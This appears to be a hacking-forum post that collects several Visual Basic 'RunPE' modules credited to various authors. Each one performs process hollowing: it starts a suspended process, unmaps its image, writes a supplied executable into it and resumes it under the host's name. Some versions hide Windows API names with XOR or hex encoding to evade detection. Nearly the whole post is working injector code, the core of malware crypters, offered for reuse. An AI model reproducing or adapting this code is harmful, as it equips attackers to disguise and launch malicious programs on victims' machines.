RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
' By Strike Bot
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub
' By Jhonjhon_123
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
On Error Resume Next
Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER
Dim bInh(247) As Byte ' IMAGE_NT_HEADERS
Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER
Dim bPi(15) As Byte ' PROCESS_INFORMATION
Dim bSi(67) As Byte ' STARTUPINFO
Dim bCtx(203) As Byte ' CONTEXT86
Dim e_lfanew As Long
Dim ImageBase As Long
Dim hProcess As Long
Dim hThread As Long
Dim SizeOfImage As Long
Dim SizeOfHeaders As Long
Dim AddressOfEntryPoint As Long
Dim NumberOfSections As Integer
Dim VirtualAddress As Long
Dim PointerToRawData As Long
Dim SizeOfRawData As Long
Dim Ebx As Long
Dim Eax As Long
Dim lTemp As Long
Dim D As Long
lTemp = 68
MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
lTemp = &H10007
MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)
For D = 0 To NumberOfSections - 1
MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
Next
Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
lTemp = ImageBase + AddressOfEntryPoint
MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
Call Call_("kernel32", "ResumeThread", hThread)
End Sub[/lenguaje]
Modded KrunPE
[lenguaje=vb]Public Function Inject(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim i As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim kernel32 As String
Dim NTDLL As String
kernel32 = "KERNEL32"
NTDLL = "NTDLL"
hModuleBase = VarPtr(bvBuff(CLng("0")))
If Not GetNumb(hModuleBase, CLng("2")) = &H5A4D Then Exit Function
hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
If Not GetNumb(hPE) = &H4550 Then Exit Function
ImageBase = GetNumb(hPE + &H34)
tSTARTUPINFO(CLng("0")) = &H44
Call Geheim("kernel32", "CreateProcessW", CLng("0"), StrPtr(sHost), CLng("0"), CLng("0"), CLng("0"), &H4, CLng("0"), CLng("0"), VarPtr(tSTARTUPINFO(CLng("0"))), VarPtr(tPROCESS_INFORMATION(CLng("0"))))
Call Geheim("NTDLL", "NtUnmapViewOfSection", tPROCESS_INFORMATION(CLng("0")), ImageBase)
Call Geheim("NTDLL", "NtAllocateVirtualMemory", tPROCESS_INFORMATION(CLng("0")), VarPtr(ImageBase), CLng("0"), VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
Call Geheim("NTDLL", "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), ImageBase, VarPtr(bvBuff(CLng("0"))), GetNumb(hPE + &H54), CLng("0"))
For i = CLng("0") To GetNumb(hPE + &H6, 2) - CLng("1")
hSec = hPE + &HF8 + (&H28 * i)
Call Geheim(NTDLL, "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), CLng("0"))
Next i
tCONTEXT(CLng("0")) = &H10007
Call Geheim("NTDLL", "NtGetContextThread", tPROCESS_INFORMATION(CLng("1")), VarPtr(tCONTEXT(CLng("0"))))
Call Geheim("NTDLL", "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), tCONTEXT(CLng("41")) + &H8, VarPtr(ImageBase), &H4, CLng("0"))
tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
Call Geheim("NTDLL", "NtSetContextThread", tPROCESS_INFORMATION(CLng("1")), VarPtr(tCONTEXT(CLng("0"))))
Call Geheim("NTDLL", "NtResumeThread", tPROCESS_INFORMATION(CLng("1")), CLng("0"))
hProcess = tPROCESS_INFORMATION(CLng("0"))
Inject = CLng("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call Geheim("NTDLL", "NtWriteVirtualMemory", -1, VarPtr(GetNumb), lPtr, lSize, CLng("0"))
End Function[/lenguaje]
Modded RunPE by f0rce
[lenguaje=vb]Private Const sKernel32Lib As String = "KERNEL32"
Private Const sNtdlllib As String = "NTDLL"
Private Const sCreateProcessW As String = "CreateProcessW"
Private Const sNtUnmapViewOfSection As String = "NtUnmapViewOfSection"
Private Const sNtAllocateVirtualMemory As String = "NtAllocateVirtualMemory"
Private Const sNtWriteVirtualMemory As String = "NtWriteVirtualMemory"
Private Const sNtGetContextThread As String = "NtGetContextThread"
Private Const sNtSetContextThread As String = "NtSetContextThread"
Private Const sNtResumeThread As String = "NtResumeThread"
Private Const sEKey As String = "Passwort"
Public Function RunPE(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim i As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim kernel32 As String
Dim NTDLL As String
hModuleBase = VarPtr(bvBuff(0))
If Not GetNumb(hModuleBase, 2) = &H5A4D Then Exit Function
hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
If Not GetNumb(hPE) = &H4550 Then Exit Function
ImageBase = GetNumb(hPE + &H34)
tSTARTUPINFO(0) = &H44
Call CallApi(XORDecryption(sKernel32Lib, sEKey), XORDecryption(sCreateProcessW, sEKey), 0, StrPtr(sHost), StrPtr(sParams), 0, 0, &H4, 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtUnmapViewOfSection, sEKey), tPROCESS_INFORMATION(0), ImageBase)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtAllocateVirtualMemory, sEKey), tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + &H54), 0)
For i = 0 To GetNumb(hPE + &H6, 2) - 1
hSec = hPE + &HF8 + (&H28 * i)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), 0)
Next i
tCONTEXT(0) = &H10007
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtGetContextThread, sEKey), tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), tCONTEXT(41) + &H8, VarPtr(ImageBase), &H4, 0)
tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtSetContextThread, sEKey), tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtResumeThread, sEKey), tPROCESS_INFORMATION(1), 0)
hProcess = tPROCESS_INFORMATION(0)
RunPE = 1
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
Public Function CallApi()
End Function
Public Function XORDecryption(DataIn As String, CodeKey As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
XORDecryption = strDataOut
End Function[/lenguaje]
Cobein RunPe
[lenguaje=vb]'---------------------------------------------------------------------------------------
' Module : cNtPEL
' DateTime : 30/06/2009 06:32
' Author : Cobein
' Purpose : Inject Exe
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any web site,
' online service, or distribute as source
' on any media without express permission.
'
' Thanks to : This is gonna be a looong list xD
' Batfitch - kernel base asm
' Karcrack - For helping me to debug and test it
' Paul Caton - vTable patch examples
' rm_code - First call api prototype
' and different books and pappers
'
' Compile : P-Code !!!
'
' Comments : Coded on top of the invoke module.
'
'---------------------------------------------------------------------------------------
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28
Private Const THUNK_APICALL As String = "8B4C240851E85989016631C0C3"
Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"
Private Const PATCH1 As String = ""
Private Const PATCH2 As String = ""
Private Const CONTEXT_FULL As Long = &H10007
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type CONTEXT
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
lpName As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
lpAddressOfFunctions As Long
lpAddressOfNames As Long
lpAddressOfNameOrdinals As Long
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)
Private c_lKrnl As Long
Private c_lLoadLib As Long
Private c_bInit As Boolean
Private c_lVTE As Long
Private c_lOldVTE As Long
Private c_bvASM(&HFF) As Byte
Public Function zDoNotCall() As Long
'This function will be replaced with machine code laterz
'Do not add any public procedure on top of it
End Function
Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
Dim i As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tCONTEXT As CONTEXT
Dim lKernel As Long
Dim lNTDll As Long
Dim lMod As Long
If Not c_bInit Then Exit Function
Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
'kernel32
lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC
'ntdll
lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC
If sHost = vbNullString Then
sHost = Space(260)
'GetModuleFileNameW
lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC
Invoke lMod, App.hInstance, StrPtr(sHost), 260
End If
With tIMAGE_NT_HEADERS.OptionalHeader
tSTARTUPINFO.cb = Len(tSTARTUPINFO)
'CreateProcessW
lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC
Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
'NtUnmapViewOfSection
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
'VirtualAllocEx
lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
'NtWriteVirtualMemory
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
Next i
tCONTEXT.ContextFlags = CONTEXT_FULL
'NtGetContextThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtWriteVirtualMemory
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
'NtSetContextThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtResumeThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, 0
hProc = tPROCESS_INFORMATION.hProcess
End With
RunPE = True
End Function
Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
Dim lPtr As Long
Dim i As Long
Dim sData As String
Dim sParams As String
If lMod = 0 Then Exit Function
For i = UBound(Params) To 0 Step -1
sParams = sParams & "68" & GetLong(CLng(Params(i)))
Next
lPtr = VarPtr(c_bvASM(0))
lPtr = lPtr + (UBound(Params) + 2) * 5
lPtr = lMod - lPtr - 5
sData = THUNK_APICALL
sData = Replace(sData, PATCH1, sParams)
sData = Replace(sData, PATCH2, GetLong(lPtr))
Call PutThunk(sData)
Invoke = PatchCall
End Function
Private Function GetLong(ByVal lData As Long) As String
Dim bvTemp(3) As Byte
Dim i As Long
CpyMem bvTemp(0), lData, &H4
For i = 0 To 3
GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2)
Next
End Function
Private Sub PutThunk(ByVal sThunk As String)
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2))
Next i
End Sub
Private Function PatchCall() As Long
CpyMem c_lVTE, ByVal ObjPtr(Me), &H4
c_lVTE = c_lVTE + &H1C
CpyMem c_lOldVTE, ByVal c_lVTE, &H4
CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4
PatchCall = zDoNotCall
CpyMem ByVal c_lVTE, c_lOldVTE, &H4
End Function
Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long
GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc)
End Function
Public Function LoadLibrary(ByVal sLib As String) As Long
LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar))
End Function
Public Property Get Initialized() As Boolean
Initialized = c_bInit
End Property
Public Sub Class_Initialize()
Call PutThunk(THUNK_KERNELBASE)
c_lKrnl = PatchCall
If Not c_lKrnl = 0 Then
c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW")
If Not c_lLoadLib = 0 Then
c_bInit = True
End If
End If
End Sub
Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY
Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
Dim lVAddress As Long
Dim lVSize As Long
Dim lBase As Long
With tIMAGE_NT_HEADERS.OptionalHeader
lVAddress = lMod + .DataDirectory(0).VirtualAddress
lVSize = lVAddress + .DataDirectory(0).Size
lBase = .ImageBase
End With
Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY)
Dim i As Long
Dim lFunctAdd As Long
Dim lNameAdd As Long
Dim lNumbAdd As Long
With tIMAGE_EXPORT_DIRECTORY
For i = 0 To .NumberOfNames - 1
CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4
If StringFromPtr(lBase + lNameAdd) = sProc Then
CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2
CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4
GetProcAddress = lFunctAdd + lBase
If GetProcAddress >= lVAddress And _
GetProcAddress <= lVSize Then
Call ResolveForward(GetProcAddress, lMod, sProc)
If Not lMod = 0 Then
GetProcAddress = GetProcAddress(lMod, sProc)
Else
GetProcAddress = 0
End If
End If
Exit Function
End If
Next
End With
End Function
Private Function ResolveForward( _
ByVal lAddress As Long, _
ByRef lLib As Long, _
ByRef sMod As String)
Dim sForward As String
sForward = StringFromPtr(lAddress)
If InStr(1, sForward, ".") Then
lLib = LoadLibrary(Split(sForward, ".")(0))
sMod = Split(sForward, ".")(1)
End If
End Function
Private Function StringFromPtr( _
ByVal lAddress As Long) As String
Dim bChar As Byte
Do
CpyMem bChar, ByVal lAddress, 1
lAddress = lAddress + 1
If bChar = 0 Then Exit Do
StringFromPtr = StringFromPtr & Chr$(bChar)
Loop
End Function
Private Function nlfpkgnrj(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData) Step 2
nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2)))
Next i
End Function[/lenguaje]
Saludos ;D
Last edited by a moderator: